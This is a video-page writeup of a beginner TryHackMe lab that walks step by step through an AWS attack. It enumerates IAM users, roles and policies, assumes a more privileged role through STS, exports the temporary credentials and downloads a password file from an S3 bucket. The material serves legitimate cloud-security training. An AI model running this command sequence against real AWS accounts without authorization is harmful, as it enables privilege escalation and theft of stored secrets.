home / videos / thm-aoc2025-day23-s3cret-santa
AWS Cloud TryHackMe Beginner

TryHackMe Advent of Cyber 2025 Day 23 | S3cret Santa

// published · 2025-12-23
TryHackMe Advent of Cyber 2025 Day 23 S3cret Santa
overview

Day 23 of TryHackMe Advent of Cyber 2025 — a beginner-friendly AWS challenge that walks through a realistic cloud attack scenario. Starting from an IAM user with limited permissions, we enumerate the environment, discover an assumable role with broader access, pivot into it using STS AssumeRole, and ultimately reach sensitive data stored in an S3 bucket. A solid introduction to AWS privilege escalation through IAM misconfigurations.

what you'll learn
IAM fundamentals Users, roles, groups, policies — inline vs managed
STS AssumeRole Pivoting from one IAM identity to another
S3 enumeration Listing buckets, objects, and retrieving files
AWS CLI basics Profile setup, credential export, identity checks
commands used
verify current identity
# always start here — confirms which account, user, and ARN you're operating as aws sts get-caller-identity
enumerate iam users
# list all IAM users in the account — note usernames for further enumeration aws iam list-users
enumerate user's groups and policies
# find which groups the user belongs to — groups can inherit permissions aws iam list-groups-for-user --user-name sir.carrotbane # list-user-policies = inline policies (embedded directly on the user) aws iam list-user-policies --user-name sir.carrotbane # list-attached-user-policies = managed policies (reusable, attached from outside) aws iam list-attached-user-policies --user-name sir.carrotbane
read the inline policy document
# retrieves the full JSON policy — look for sts:AssumeRole permissions # that's the key to pivoting to a more privileged identity aws iam get-user-policy \ --policy-name SirCarrotbanePolicy \ --user-name sir.carrotbane
enumerate iam roles and target role policies
# list all roles — look for assumable roles with interesting names or permissions aws iam list-roles # enumerate inline and managed policies on the target role aws iam list-role-policies --role-name bucketmaster aws iam list-attached-role-policies --role-name bucketmaster # read the full policy — confirm this role has S3 access before assuming it aws iam get-role-policy \ --role-name bucketmaster \ --policy-name BucketMasterPolicy
assume the role — pivot to bucketmaster
# AssumeRole returns temporary credentials: AccessKeyId, SecretAccessKey, SessionToken # replace the ARN with the actual account ID from your environment aws sts assume-role \ --role-arn arn:aws:iam::123456789012:role/bucketmaster \ --role-session-name scb-bm
export temporary credentials
# paste the values from the assume-role output above # once exported, all subsequent aws commands run as bucketmaster export AWS_ACCESS_KEY_ID="ASIA********" export AWS_SECRET_ACCESS_KEY="tAcT2P****" export AWS_SESSION_TOKEN="FQoGZXIvYXd********g6WqA="
verify new identity and access s3
# confirm you're now operating as bucketmaster aws sts get-caller-identity # list all accessible buckets under the new role aws s3api list-buckets # enumerate objects inside the target bucket aws s3api list-objects --bucket easter-secrets-123145 # download the file — --key is the object path, last arg is local filename aws s3api get-object \ --bucket easter-secrets-123145 \ --key cloud_password.txt \ cloud_password.txt # verify the file downloaded and read its contents ls cat cloud_password.txt